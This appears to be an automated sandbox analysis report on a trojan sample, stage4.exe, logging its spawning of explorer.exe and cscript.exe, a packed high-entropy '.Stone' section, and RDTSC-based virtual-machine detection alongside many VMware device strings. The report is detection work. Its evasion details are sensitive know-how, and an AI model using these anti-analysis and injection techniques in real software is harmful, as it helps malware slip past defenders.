Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010E8680 NtReadFile,	22_2_010E8680
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010E85CA NtCreateFile,	22_2_010E85CA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010E87AA NtAllocateVirtualMemory,	22_2_010E87AA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010E867C NtReadFile,	22_2_010E867C

Source: stage4.exe

Static PE information: No import functions for PE file found

Source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamecscript.exe` vs stage4.exe
Source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs stage4.exe

Source: stage4.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\stage4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\stage4.exe "C:\Users\user\Desktop\stage4.exe"
Source: C:\Users\user\Desktop\stage4.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/0@13/3

Source: C:\Windows\explorer.exe

File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\stage4.exe

Process created: C:\Windows\explorer.exe

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: stage4.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cscript.pdbUGP source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, cscript.exe, 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, cscript.exe
Source:	Binary string: cscript.pdb source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0120A13B push ss; iretd	0_2_0120A13D
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121B822 push eax; ret	0_2_0121B828
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121B82B push eax; ret	0_2_0121B892
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121B88C push eax; ret	0_2_0121B892
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01215BCB push FFFFFFBFh; retf	0_2_01215BE9
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_0121B7D5 push eax; ret	0_2_0121B828
Source: C:\Users\user\Desktop\stage4.exe	Code function: 0_2_01215E2F push 7EDC995Dh; retf	0_2_01215E34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_0550D0D1 push ecx; ret	22_2_0550D0E4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010DA13B push ss; iretd	22_2_010DA13D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010EB82B push eax; ret	22_2_010EB892
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010EB822 push eax; ret	22_2_010EB828
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010EB88C push eax; ret	22_2_010EB892
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010E5BCB push FFFFFFBFh; retf	22_2_010E5BE9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010EB7D5 push eax; ret	22_2_010EB828
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010E5E2F push 7EDC995Dh; retf	22_2_010E5E34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 22_2_010EBEC8 pushad ; ret	22_2_010EBEC9

Source: stage4.exe

Static PE information: section name: .Stone

Source: initial sample

Static PE information: section where entry point is pointing to: .Stone

Source: initial sample

Static PE information: section name: .text entropy: 7.32674754274

Source: C:\Windows\explorer.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\stage4.exe	RDTSC instruction interceptor: First address: 0000000001208604 second address: 000000000120860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\stage4.exe	RDTSC instruction interceptor: First address: 000000000120898E second address: 0000000001208994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000010D8604 second address: 00000000010D860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000010D898E second address: 00000000010D8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\stage4.exe

Code function: 0_2_012088C0 rdtsc

0_2_012088C0

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 568			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 758			Jump to behavior

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\SysWOW64\cscript.exe

API coverage: 9.2 %

Source: C:\Users\user\Desktop\stage4.exe

Process information queried: ProcessInformation

Jump to behavior

Source: explorer.exe, 0000000F.00000000.359059122.0000000005CF6000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.1_neutQ
Source: explorer.exe, 0000000F.00000003.344090419.0000000008610000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Z
Source: explorer.exe, 0000000F.00000000.358953220.0000000005C70000.00000004.00000001.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00WBG
Source: explorer.exe, 0000000F.00000000.358953220.0000000005C70000.00000004.00000001.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 0000000F.00000000.385407093.00000000087B3000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000R
Source: explorer.exe, 0000000F.00000000.359059122.0000000005CF6000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.255243120.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: fb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5& 6
Source: explorer.exe, 0000000F.00000003.349672505.0000000008816000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000003.349066047.00000000087EB000.00000004.00000001.sdmp	Binary or memory string: war&prod_vmware_sata_cd00#5&
Source: explorer.exe, 0000000F.00000003.380241749.00000000087E8000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bn
Source: explorer.exe, 0000000F.00000000.358953220.0000000005C70000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000F.00000003.354472315.00000000087AE000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000001.00000000.255243120.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 0000000F.00000000.359006696.0000000005CAF000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000b
Source: explorer.exe, 0000000F.00000003.380241749.00000000087E8000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be
Source: explorer.exe, 0000000F.00000003.344802418.00000000086AA000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ri&
Source: explorer.exe, 0000000F.00000003.354483065.00000000087B0000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bg
Source: explorer.exe, 00000001.00000000.264327118.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 0000000F.00000003.349672505.0000000008816000.00000004.00000001.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\h
Source: explorer.exe, 0000000F.00000003.381262125.00000000087E7000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00f
Source: explorer.exe, 0000000F.00000003.354472315.00000000087AE000.00000004.00000001.sdmp	Binary or memory string: 2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B]
Source: explorer.exe, 0000000F.00000000.358953220.0000000005C70000.00000004.00000001.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00C
Source: explorer.exe, 0000000F.00000003.349672505.0000000008816000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000003.345040104.0000000008610000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000~
Source: explorer.exe, 0000000F.00000003.354705201.00000000085E7000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00e
Source: explorer.exe, 0000000F.00000003.354472315.00000000087AE000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00
Source: explorer.exe, 0000000F.00000003.344899906.0000000008703000.00000004.00000001.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000F.00000000.379208597.0000000005E3F000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000F.00000003.349672505.0000000008816000.00000004.00000001.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000003.380241749.00000000087E8000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 0000000F.00000003.380241749.00000000087E8000.00000004.00000001.sdmp	Binary or memory string: me#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B[
Source: explorer.exe, 0000000F.00000000.316777777.0000000000A07000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000003.344899906.0000000008703000.00000004.00000001.sdmp	Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000000F.00000003.349672505.0000000008816000.00000004.00000001.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 0000000F.00000003.349949395.000000000870A000.00000004.00000001.sdmp	Binary or memory string: 9Tm\Device\HarddiskVolume2\??\Volume{ef47ea26-ec76-4a6e-8680-9e53b539546d}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 0000000F.00000003.380336457.000000000881E000.00000004.00000001.sdmp	Binary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B\
Source: explorer.exe, 0000000F.00000000.316777777.0000000000A07000.00000004.00000020.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000k4
Source: explorer.exe, 00000001.00000000.264327118.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000001.00000000.274439870.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
